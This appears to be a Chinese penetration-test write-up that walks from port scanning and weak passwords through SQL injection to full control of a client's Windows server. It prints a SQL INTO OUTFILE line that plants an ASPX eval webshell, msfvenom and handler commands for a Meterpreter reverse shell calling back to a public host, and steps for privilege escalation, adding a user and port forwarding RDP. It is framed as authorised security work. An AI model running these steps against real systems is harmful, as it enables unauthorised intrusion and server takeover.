前言

在某次做渗透项目时，客户只提供了一个IP。作为菜鸟的我开始远航。

信息收集

Nmap扫描一下端口，注意扫描高位端口，往往有意外收获。

弱口令尝试登录。

简单汇总一下。

漏洞探测

登录进后台测试发现两个系统均存在sql注入。

还在8000端口上的crocus系统中找到一处任意文件下载漏洞。

原来是日志下载。点击发现页面中存在绝对路径。

OK！！！收集一下绝对路径。

现在的思路是：

在有绝对路径的前提下，配合sql注入，利用sqlmap的—sql-shell尝试可以写一句话木马。

漏洞利用

仔细看这个绝对路径。听说仔细盯着它看会有奇效。（笑） 

WCMS4.0这个好像在哪见过。 

没错。就是12055端口，登录后台

可以利用这个后台的sql注入来写shell。

sql注入点大概在搜索位置。

拦截数据包，保存为post.txt。使用sqlmap开始注入。

有注入，有dba权限，有绝对路径。shell一条龙就此准备。

Webshell

开始写入aspx一句话木马。 

select   '<%@  Page  Language="Javascript"%> <%eval(Request.Item["pass"]);%>'   INTO  OUTFILE   'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'

没毛病，访问一下。

Nice！！！

菜刀连接。

控制服务器

先收集一下该服务器的信息

该服务器运行在内网，这里选择使用msf马反弹shell后进行端口转发。

关于如何在外网打造一台metasploit。推荐文章：

http://www.sqlsec.com/2018/03/cloud.html#more

生成msf马

msfvenom -p  windows/x64/meterpreter/reverse_tcp  LHOST=xx.xx.xx.xx  LPORT=2333  -f  exe >  road.exe

xx.xx.xx.xx为公网服务器

2333为公网端口

将生成的msf马通过中国菜刀上传至肉鸡。

外网metasploit开始配置监听

use  exploit/multi/handle

set  payload 

windows/x64/meterpreter/reverse_tcp

set  lhost  127.0.0.1

run

简单执行几条meterpreter命令

getuid    当前权限

getsystem  进行提权

run  getgui   -u  xxxxx   -p  xxxxx  

在目标机器上添加用户

portfwd  add  -l  3389  -r  192.168.1.18   -p  3389 

将3389端口转发至本地

端口转发连接本地的3389

出现身份验证错误

解决方案

http://www.cnblogs.com/raswin/p/9018388.html

---

总结

这次项目成功getshell主要利用了高位端口扫描、弱口令、SQL注入、文件下载漏洞。愿每次渗透测试都会遇到不一样的自己。

关注我们

我是Tide安全团队的CSeroad，对web安全感兴趣的小伙伴可以关注或加入我们。Tide安全团队（http://www.TideSec.net）：

来源：freebuf.com 2019-02-25 14:34:12 by: CSeroad